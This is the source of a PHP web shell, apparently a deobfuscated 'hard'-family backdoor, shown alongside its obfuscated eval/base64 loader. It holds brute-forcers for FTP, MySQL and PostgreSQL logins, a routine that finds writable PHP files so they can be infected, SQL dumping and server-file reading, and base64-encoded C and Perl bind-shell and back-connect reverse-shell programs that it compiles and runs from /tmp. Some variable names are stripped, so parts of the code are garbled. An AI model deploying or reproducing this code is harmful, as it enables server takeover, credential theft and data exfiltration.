echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value="submit"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value="submit"></form>';
if ($temp) {
echo '<pre class="ml1" style="margin-top:5px" id="Output">' .
$temp .
'</pre>';
}
echo '</div>';
hardFooter();
}
function actionLogout()
{
setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
die('bye!');
}
function actionSelfRemove()
{
if ($_POST['p1'] == 'yes') {
if (@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) {
die('Shell has been removed');
} else {
echo 'unlink error!';
}
}
if ($_POST['p1'] != 'yes') {
hardHeader();
}
echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
hardFooter();
}
function actionInfect()
{
hardHeader();
echo '<h1>Infect</h1><div class=content>';
if ($_POST['p1'] == 'infect') {
$target = $_SERVER['DOCUMENT_ROOT'];
function ListFiles($dir)
{
if ($dh = opendir($dir)) {
$files = [];
$inner_files = [];
while ($file = readdir($dh)) {
if ($file != '.' && $file != '..') {
if (is_dir($dir . '/' . $file)) {
$inner_files = ListFiles($dir . '/' . $file);
if (is_array($inner_files)) {
$files = array_merge($files, $inner_files);
}
} else {
array_push($files, $dir . '/' . $file);
}
}
}
closedir($dh);
return $files;
}
}
foreach (ListFiles($target) as $key => $file) {
$nFile = substr($file, -4, 4);
if ($nFile == '.php') {
if (
$file != $_SERVER['DOCUMENT_ROOT'] . $_SERVER['PHP_SELF'] &&
is_writeable($file)
) {
echo "$file<br>";
$i++;
}
}
}
echo "<font color=red size=14>$i</font>";
} else {
echo '<form method=post><input type=submit value=Infect name=infet></form>';
echo 'Really want to infect the server? <a href=# onclick="g(null,null,\'infect\')">Yes</a></div>';
}
hardFooter();
}
function actionBruteforce()
{
hardHeader();
if (isset($_POST['proto'])) {
echo '<h1>Results</h1><div class=content><span>Type:</span> ' .
htmlspecialchars($_POST['proto']) .
' <span>Server:</span> ' .
htmlspecialchars($_POST['server']) .
'<br>';
if ($_POST['proto'] == 'ftp') {
function bruteForce($ip, $port, $login, $pass)
{
$fp = @ftp_connect($ip, $port ? $port : 21);
if (!$fp) {
return false;
}
$res = @ftp_login($fp, $login, $pass);
@ftp_close($fp);
return $res;
}
} elseif ($_POST['proto'] == 'mysql') {
function bruteForce($ip, $port, $login, $pass)
{
$res = mysqli_connect(
$ip . ':' . ($port ? $port : 3306),
$login,
$pass
);
mysqli_close($res);
return $res;
}
} elseif ($_POST['proto'] == 'pgsql') {
function bruteForce($ip, $port, $login, $pass)
{
$str =
"host='" .
$ip .
"' port='" .
$port .
"' user='" .
$login .
"' password='" .
$pass .
"' dbname=postgres";
$res = @pg_connect($str);
@pg_close($res);
return $res;
}
}
$success = 0;
$attempts = 0;
$server = explode(':', $_POST['server']);
if ($_POST['type'] == 1) {
$temp = @file('/etc/passwd');
if (is_array($temp)) {
foreach ($temp as $line) {
$line = explode(':', $line);
++$attempts;
if (
bruteForce(@$server[0], @$server[1], $line[0], $line[0])
) {
$success++;
echo '<b>' .
htmlspecialchars($line[0]) .
'</b>:' .
htmlspecialchars($line[0]) .
'<br>';
}
if (@$_POST['reverse']) {
$tmp = '';
for ($i = strlen($line[0]) - 1; $i >= 0; --$i) {
$tmp .= $line[0][$i];
}
++$attempts;
if (
bruteForce(@$server[0], @$server[1], $line[0], $tmp)
) {
$success++;
echo '<b>' .
htmlspecialchars($line[0]) .
'</b>:' .
htmlspecialchars($tmp);
}
}
}
}
} elseif ($_POST['type'] == 2) {
$temp = @file($_POST['dict']);
if (is_array($temp)) {
foreach ($temp as $line) {
$line = trim($line);
++$attempts;
if (
bruteForce(
$server[0],
@$server[1],
$_POST['login'],
$line
)
) {
$success++;
echo '<b>' .
htmlspecialchars($_POST['login']) .
'</b>:' .
htmlspecialchars($line) .
'<br>';
}
}
}
}
echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
}
echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>' .
'<td><label><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></label></td></tr><tr><td>' .
'<input type=hidden name=c value="' .
htmlspecialchars($GLOBALS['cwd']) .
'">' .
'<input type=hidden name=a value="' .
htmlspecialchars($_POST['a']) .
'">' .
'<input type=hidden name=charset value="' .
htmlspecialchars($_POST['charset']) .
'">' .
'<input type=hidden name=ne value="">' .
'<span>Server:port</span></td>' .
'<td><input type=text name=server value="127.0.0.1"></td></tr>' .
'<tr><td><span>Brute type</span></td>' .
'<td><input type=radio name=type value="1" checked> /etc/passwd</td></tr>' .
'<tr><td></td><td style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</td></tr>' .
'<tr><td></td><td><input type=radio name=type value="2"> Dictionary</td></tr>' .
'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' .
'<td><input type=text name=login value="root"></td></tr>' .
'<tr><td><span>Dictionary</span></td>' .
'<td><input type=text name=dict value="' .
htmlspecialchars($GLOBALS['cwd']) .
'passwd.dic"></td></tr></table>' .
'</td></tr><tr><td></td><td><input type=submit value="submit"></td></tr></form></table>';
echo '</div>';
hardFooter();
}
function actionSql()
{
class DbClass
{
var $type;
var $link;
var $res;
function __construct($type)
{
$this->type = $type;
}
function connect($host, $user, $pass, $dbname)
{
var_dump($host);
switch ($this->type) {
case 'mysql':
if ($this->link = mysqli_connect($host, $user, $pass)) {
return true;
}
break;
case 'pgsql':
$host = explode(':', $host);
if (!$host[1]) {
$host[1] = 5432;
}
if (
$this->link = @pg_connect(
"host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname"
)
) {
return true;
}
break;
}
return false;
}
function selectdb($db)
{
switch ($this->type) {
case 'mysql':
if (mysqli_select_db($this->link, $db)) {
return true;
}
break;
}
return false;
}
function query($str)
{
switch ($this->type) {
case 'mysql':
return $this->res = mysqli_query($this->link, $str);
break;
case 'pgsql':
return $this->res = @pg_query($this->link, $str);
break;
}
return false;
}
function fetch()
{
$res = func_num_args() ? func_get_arg(0) : $this->res;
switch ($this->type) {
case 'mysql':
return mysqli_fetch_assoc($res);
break;
case 'pgsql':
return @pg_fetch_assoc($res);
break;
}
return false;
}
function listDbs()
{
switch ($this->type) {
case 'mysql':
return $this->query('SHOW databases');
break;
case 'pgsql':
return $this->res = $this->query(
"SELECT datname FROM pg_database WHERE datistemplate!='t'"
);
break;
}
return false;
}
function listTables()
{
switch ($this->type) {
case 'mysql':
return $this->res = $this->query('SHOW TABLES');
break;
case 'pgsql':
return $this->res = $this->query(
"select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"
);
break;
}
return false;
}
function error()
{
switch ($this->type) {
case 'mysql':
return mysqli_error($this->link);
break;
case 'pgsql':
return @pg_last_error();
break;
}
return false;
}
function setCharset($str)
{
switch ($this->type) {
case 'mysql':
if (function_exists('mysql_set_charset')) {
return mysqli_set_charset($str, $this->link);
} else {
$this->query('SET CHARSET ' . $str);
}
break;
case 'pgsql':
return @pg_set_client_encoding($this->link, $str);
break;
}
return false;
}
function loadFile($str)
{
switch ($this->type) {
case 'mysql':
return $this->fetch(
$this->query(
"SELECT LOAD_FILE('" .
addslashes($str) .
"') as file"
)
);
break;
case 'pgsql':
$this->query(
"CREATE TABLE hard2(file text);COPY hard2 FROM '" .
addslashes($str) .
"';select file from hard2;"
);
$r = [];
while ($i = $this->fetch()) {
$r[] = $i['file'];
}
$this->query('drop table hard2');
return ['file' => implode("
", $r)];
break;
}
return false;
}
function dump($table, $fp = false)
{
switch ($this->type) {
case 'mysql':
$res = $this->query('SHOW CREATE TABLE `' . $table . '`');
$create = mysql_fetch_array($res);
$sql = $create[1] . ";
";
if ($fp) {
fwrite($fp, $sql);
} else {
echo $sql;
}
$this->query('SELECT * FROM `' . $table . '`');
$i = 0;
$head = true;
while ($ = $this->fetch()) {
$sql = '';
if ($i % 1000 == 0) {
$head = true;
$sql = ";
";
}
$columns = [];
foreach ($ as $k => $v) {
if ($v === null) {
$[$k] = 'NULL';
} elseif (is_int($v)) {
$[$k] = $v;
} else {
$[$k] =
"'" . mysqli_real_escape_string($v) . "'";
}
$columns[] = '`' . $k . '`';
}
if ($head) {
$sql .=
'INSERT INTO `' .
$table .
'` (' .
implode(', ', $columns) .
") VALUES
(" .
implode(', ', $) .
')';
$head = false;
} else {
$sql .= "
,(" . implode(', ', $) . ')';
}
if ($fp) {
fwrite($fp, $sql);
} else {
echo $sql;
}
$i++;
}
if (!$head) {
if ($fp) {
fwrite($fp, ";
");
} else {
echo ";
";
}
}
break;
case 'pgsql':
$this->query('SELECT * FROM ' . $table);
while ($ = $this->fetch()) {
$columns = [];
foreach ($ as $k => $v) {
$[$k] = "'" . addslashes($v) . "'";
$columns[] = $k;
}
$sql =
'INSERT INTO ' .
$table .
' (' .
implode(', ', $columns) .
') VALUES (' .
implode(', ', $) .
');' .
"
";
if ($fp) {
fwrite($fp, $sql);
} else {
echo $sql;
}
}
break;
}
return false;
}
}
$db = new DbClass($_POST['type']);
if (@$_POST['p2'] == 'download' && @$_POST['p1'] != 'select') {
$db->connect(
$_POST['sql_host'],
$_POST['sql_login'],
$_POST['sql_pass'],
$_POST['sql_base']
);
$db->selectdb($_POST['sql_base']);
switch ($_POST['charset']) {
case 'Windows-1251':
$db->setCharset('cp1251');
break;
case 'UTF-8':
$db->setCharset('utf8');
break;
case 'KOI8-R':
$db->setCharset('koi8r');
break;
case 'KOI8-U':
$db->setCharset('koi8u');
break;
case 'cp866':
$db->setCharset('cp866');
break;
}
if (empty($_POST['file'])) {
ob_start('ob_gzhandler', 4096);
header('Content-Disposition: attachment; filename=dump.sql');
header('Content-Type: text/plain');
foreach ($_POST['tbl'] as $v) {
$db->dump($v);
}
exit();
} elseif ($fp = @fopen($_POST['file'], 'w')) {
foreach ($_POST['tbl'] as $v) {
$db->dump($v, $fp);
}
fclose($fp);
unset($_POST['p2']);
} else {
die(
'<script>alert("Error! Can\'t open file");window.history.back(-1)</script>'
);
}
}
hardHeader();
echo "
<h1>Sql browser</h1><div class=content>
<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
<input type=hidden name=ne value=''><input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p3 value=''><input type=hidden name=p2 value=''><input type=hidden name=c value='" .
htmlspecialchars($GLOBALS['cwd']) .
"'><input type=hidden name=charset value='" .
(isset($_POST['charset']) ? $_POST['charset'] : '') .
"'>
<td><label><select name='type'><option value='mysql' ";
if (@$_POST['type'] == 'mysql') {
echo 'selected';
}
echo ">MySql</option><option value='pgsql' ";
if (@$_POST['type'] == 'pgsql') {
echo 'selected';
}
echo ">PostgreSql</option></select></label></td>
<td><input type=text name=sql_host value=\"" .
(empty($_POST['sql_host'])
? 'localhost'
: htmlspecialchars($_POST['sql_host'])) .
"\"></td>
<td><input type=text name=sql_login value=\"" .
(empty($_POST['sql_login'])
? 'root'
: htmlspecialchars($_POST['sql_login'])) .
"\"></td>
<td><input type=text name=sql_pass value=\"" .
(empty($_POST['sql_pass'])
? ''
: htmlspecialchars($_POST['sql_pass'])) .
"\" required></td><td>";
$tmp = "<input type=text name=sql_base value=''>";
if (isset($_POST['sql_host'])) {
if (
$db->connect(
$_POST['sql_host'],
$_POST['sql_login'],
$_POST['sql_pass'],
$_POST['sql_base']
)
) {
switch ($_POST['charset']) {
case 'Windows-1251':
$db->setCharset('cp1251');
break;
case 'UTF-8':
$db->setCharset('utf8');
break;
case 'KOI8-R':
$db->setCharset('koi8r');
break;
case 'KOI8-U':
$db->setCharset('koi8u');
break;
case 'cp866':
$db->setCharset('cp866');
break;
}
$db->listDbs();
echo "<label><select name=sql_base><option value=''></option>";
while ($ = $db->fetch()) {
list($key, $value) = each($);
echo '<option value="' .
$value .
'" ' .
($value == $_POST['sql_base'] ? 'selected' : '') .
'>' .
$value .
'</option>';
}
echo '</select></label>';
} else {
echo $tmp;
}
} else {
echo $tmp;
}
echo "</td>
<td><input type=submit value='submit' onclick='fs(d.sf);'></td>
<td><input type=checkbox name=sql_count value='on'" .
(empty($_POST['sql_count']) ? '' : ' checked') .
"> count the number of rows</td>
</tr>
</table>
<script>
s_db='" .
@addslashes($_POST['sql_base']) .
"';
function fs(f) {
if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
if(f.p1) f.p1.value='';
if(f.p2) f.p2.value='';
if(f.p3) f.p3.value='';
}
}
function st(t,l) {
d.sf.p1.value = 'select';
d.sf.p2.value = t;
if(l && d.sf.p3) d.sf.p3.value = l;
d.sf.submit();
}
function is() {
for(i=0;i<d.sf.elements['tbl[]'].length;++i)
d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
}
</script>";
if (isset($db) && $db->link) {
echo '<br/><table width=100% cellpadding=2 cellspacing=0>';
if (!empty($_POST['sql_base'])) {
$db->selectdb($_POST['sql_base']);
echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
$tbls_res = $db->listTables();
while ($ = $db->fetch($tbls_res)) {
list($key, $value) = each($);
if (!empty($_POST['sql_count'])) {
$n = $db->fetch(
$db->query('SELECT COUNT(*) as n FROM ' . $value . '')
);
}
$value = htmlspecialchars($value);
echo "<nobr><input type='checkbox' name='tbl[]' value='" .
$value .
"'> <a href=# onclick=\"st('" .
$value .
"',1)\">" .
$value .
'</a>' .
(empty($_POST['sql_count'])
? ' '
: " <small>({$n['n']})</small>") .
'</nobr><br>';
}
echo "<input type='checkbox' onclick='is();'> <input type=submit value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
if (@$_POST['p1'] == 'select') {
$_POST['p1'] = 'query';
$_POST['p3'] = $_POST['p3'] ? $_POST['p3'] : 1;
$db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
$num = $db->fetch();
$pages = ceil($num['n'] / 30);
echo "<script>d.sf.onsubmit=function(){st(\"" .
$_POST['p2'] .
"\", d.sf.p3.value)}</script><span>" .
$_POST['p2'] .
"</span> ({$num['n']} records) Page # <input type=text name='p3' value=" .
((int) $_POST['p3']) .
'>';
echo " of $pages";
if ($_POST['p3'] > 1) {
echo " <a href=# onclick='st(\"" .
$_POST['p2'] .
'", ' .
($_POST['p3'] - 1) .
")'>< Prev</a>";
}
if ($_POST['p3'] < $pages) {
echo " <a href=# onclick='st(\"" .
$_POST['p2'] .
'", ' .
($_POST['p3'] + 1) .
")'>Next ></a>";
}
$_POST['p3']--;
if ($_POST['type'] == 'pgsql') {
$_POST['p2'] =
'SELECT * FROM ' .
$_POST['p2'] .
' LIMIT 30 OFFSET ' .
$_POST['p3'] * 30;
} else {
$_POST['p2'] =
'SELECT * FROM `' .
$_POST['p2'] .
'` LIMIT ' .
$_POST['p3'] * 30 .
',30';
}
echo '<br><br>';
}
if (@$_POST['p1'] == 'query' && !empty($_POST['p2'])) {
$db->query(@$_POST['p2']);
if ($db->res !== false) {
$title = false;
echo '<table width=100% cellspacing=1 cellpadding=2 class=main>';
$line = 1;
while ($ = $db->fetch()) {
if (!$title) {
echo '<tr>';
foreach ($ as $key => $value) {
echo '<th>' . $key . '</th>';
}
reset($);
$title = true;
echo '</tr><tr>';
$line = 2;
}
echo '<tr class="l' . $line . '">';
$line = $line == 1 ? 2 : 1;
foreach ($ as $key => $value) {
if ($value == null) {
echo '<td><i>null</i></td>';
} else {
echo '<td>' .
nl2br(htmlspecialchars($value)) .
'</td>';
}
}
echo '</tr>';
}
echo '</table>';
} else {
echo '<div><b>Error:</b> ' .
htmlspecialchars($db->error()) .
'</div>';
}
}
echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
if (!empty($_POST['p2']) && $_POST['p1'] != 'loadfile') {
echo htmlspecialchars($_POST['p2']);
}
echo "</textarea><br/><input type=submit value='Execute'>";
echo '</td></tr>';
}
echo '</table></form><br/>';
if ($_POST['type'] == 'mysql') {
$db->query(
"SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"
);
if ($db->fetch()) {
echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='submit'></form>";
}
}
if (@$_POST['p1'] == 'loadfile') {
$file = $db->loadFile($_POST['p2']);
echo '<br/><pre class=ml1>' .
htmlspecialchars($file['file']) .
'</pre>';
}
} else {
echo htmlspecialchars($db->error());
}
echo '</div>';
hardFooter();
}
function actionNetwork()
{
hardHeader();
$back_connect_c =
'I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9';
$back_connect_p =
'IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7';
$bind_port_c =
'I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9';
$bind_port_p =
'IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=';
echo "<h1>Network tools</h1><div class=content>
<form name='nfp' onSubmit='g(null,null,this.using.value,this.port.value,this.pass.value);return false;'>
<span>Bind port to /bin/sh</span><br/>
Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass'> Using: <label><select name='using'><option value='bpc'>C</option><option value='bpp'>Perl</option></select></label> <input type=submit value='submit'>
</form>
<form name='nfp' onSubmit='g(null,null,this.using.value,this.server.value,this.port.value);return false;'>
<span>Back-connect to</span><br/>
Server: <input type='text' name='server' value=" .
$_SERVER['REMOTE_ADDR'] .
"> Port: <input type='text' name='port' value='31337'> Using: <label><select name='using'><option value='bcc'>C</option><option value='bcp'>Perl</option></select></label> <input type=submit value='submit'>
</form><br>";
if (isset($_POST['p1'])) {
function cf($f, $t)
{
($w = @fopen($f, 'w')) or @function_exists('file_put_contents');
if ($w) {
@fwrite($w, base64_decode($t)) or
@fputs($w, base64_decode($t)) or
@file_put_contents($f, base64_decode($t));
@fclose($w);
}
}
if ($_POST['p1'] == 'bpc') {
cf('/tmp/bp.c', $bind_port_c);
$ = ex('gcc -o /tmp/bp /tmp/bp.c');
@unlink('/tmp/bp.c');
$ .= ex('/tmp/bp ' . $_POST['p2'] . ' ' . $_POST['p3'] . ' &');
echo "<pre class=ml1>$" . ex('ps aux | grep bp') . '</pre>';
}
if ($_POST['p1'] == 'bpp') {
cf('/tmp/bp.pl', $bind_port_p);
$ = ex(which('perl') . ' /tmp/bp.pl ' . $_POST['p2'] . ' &');
echo "<pre class=ml1>$" . ex('ps aux | grep bp.pl') . '</pre>';
}
if ($_POST['p1'] == 'bcc') {
cf('/tmp/bc.c', $back_connect_c);
$ = ex('gcc -o /tmp/bc /tmp/bc.c');
@unlink('/tmp/bc.c');
$ .= ex('/tmp/bc ' . $_POST['p2'] . ' ' . $_POST['p3'] . ' &');
echo "<pre class=ml1>$" . ex('ps aux | grep bc') . '</pre>';
}
if ($_POST['p1'] == 'bcp') {
cf('/tmp/bc.pl', $back_connect_p);
$ = ex(
which('perl') .
' /tmp/bc.pl ' .
$_POST['p2'] .
' ' .
$_POST['p3'] .
' &'
);
echo "<pre class=ml1>$" . ex('ps aux | grep bc.pl') . '</pre>';
}
}
echo '</div>';
hardFooter();
}
if (empty($_POST['a'])) {
if (isset($) && function_exists('action' . $)) {
$_POST['a'] = $;
} else {
$_POST['a'] = 'FilesMan';
}
}
if (!empty($_POST['a']) && function_exists('action' . $_POST['a'])) {
call_user_func('action' . $_POST['a']);
}
Did this file decode correctly?
Original Code
<?php
eval(
str_rot13(
gzuncompress(
base64_decode(
'eNpVjk0LgkAURdcF/gcR17OKNtKmnPJb0yJoEyqamPOpaPjrmwlSe8vz3jv3KnqUYnowLeJEmbpTtQ5VmqGj2g9eSdM4bSlhSrMxF7ji4/FMYMIlLHhZasZ6JUfR7/QJb/UJuWK1dIKlC8yG6bHYeyMLQiSVBJdcxGBq9Z4Z2xJtNw8mUMda5+rHuM8l5FQgZ7DdPCJv2wq+lxnjcx14udDCDFtrgLLQLwRMbrBQgj+X8QGz8E9e'
)
)
)
);
eval(
$MctRJwTzX(
$RGGcrQBfUjR(
'eJztvet22ziyKPx/1pp3YNSepty2ZUm+JLEtJ44viXNz2pfcszUURUmMKVFNUr4knb/nEWadc/ZZa6/zDOdFvmeYJ/mqCgAJkCBFOU5P7722upNIJFAoFAqFQqFQ9de/zP3zH/9utAzzbt1udu7fv7tur3fXVu6u150Ve6Xr3L3fu9u811vpmpt/xbL/E8pGwcRhv/4P1jw7PVi6x1//b3xw4HpO+MIa8Wf/C54Nu2vVufbJ/vHr/eMP5pPT01ftM/jV3nm8//LU/DQPJd2eUb3jhqETQcndo6Nnh/sfNNWeHJ1gBaNmmOfONXybN77+9S8GfMaBH/nR9dipTq+2aCBi2Ow31rIzHEfXUOkVlPtg2gMrAERk6JlX0CukQAIiRp4VHDlydSygvrfk13ILFsF2bX90UU3e4secRD0g9aL6NINZ6n3XsYPrsdIwdH8WEifwkGL477e8Xtl5vbJ/cK/sH9mrcSOvW/jmh/YLG/iBHWvmdqz5ozvW/KEdW8nt2MqP7tjK7XQM/u9NRnbk+qOkjTAKAPb4sgt1hGSCX9ChjhU666ttZ2T7XadKRTgsrJQUAFBUAB7GBaBS2x5gIdOUn7GKyTMXftX5j8sBiHmjCs+2DCjnOSMGUyF6zw+gyGeqZsC/SVHCDx4tLCgVUujA31U/6BLkD3Mu0OzfDPoN1T/MfYYh3tTURbRrrRhOuoi7sJB6hPwDHdlu5fdEfDqBY52nqn9Lfn5T+DJwokkwSlOeo8hXn7/+5aE7ctvIvKYTBH7Q9vw+LFCjiedhkeQtPG9TiRBe19V3Q+uq7Vw59gTZpR25QycuA+/pQdtzh25UZQ+7Ts8dOVUTmPLk8OglFDYbtbqJ7/76l+VfjOr/93/njUaj1qw3GoZ/3DF+WcY3tM7xtRIUh6L1bWyFITL5zz/z1V993KLl898VGpdZwRdZtez8T8CU1yIAj99/l0XE9BrGHYY4q6WgD/Kh+9zvu6OqOotn12ysz9aVqnzMUA2mTbXj+9484vk/N1VBIuEYCxB5UAt0NFWaTkIn2Ok7oyiE9j6k5Ohj3+97TlqQmifeJBhnnr44efnIjzKPXattBfbAvXCCzLt31qjrXGUeH1vDjqcW/yRNVZVLGMM5/fbQiuxBNTvTzWUTiOoOxx7OWvN3VBqTXhPBl900Dmy0comoFpblflrWDByr6wRVArEMU9NYra8aL/3IOPAno66ZlnvOFUxt+aEqiLquI/WwsjWIht72FraxnTzeGjqRZYysodMyu05oB+4YecY0YKmMoM8t8yBwwkEEvBXWRk5k/G5ID8aX6u/I5z9P8Se8e+SEkXEytoZDd9Q3Tgb+GB6ewUAG/QD7ZLywgnNYX3MwgpXyEkR/+CdBx5pEAz9II0PAzW3DSFcaRNF4yflt4l60zF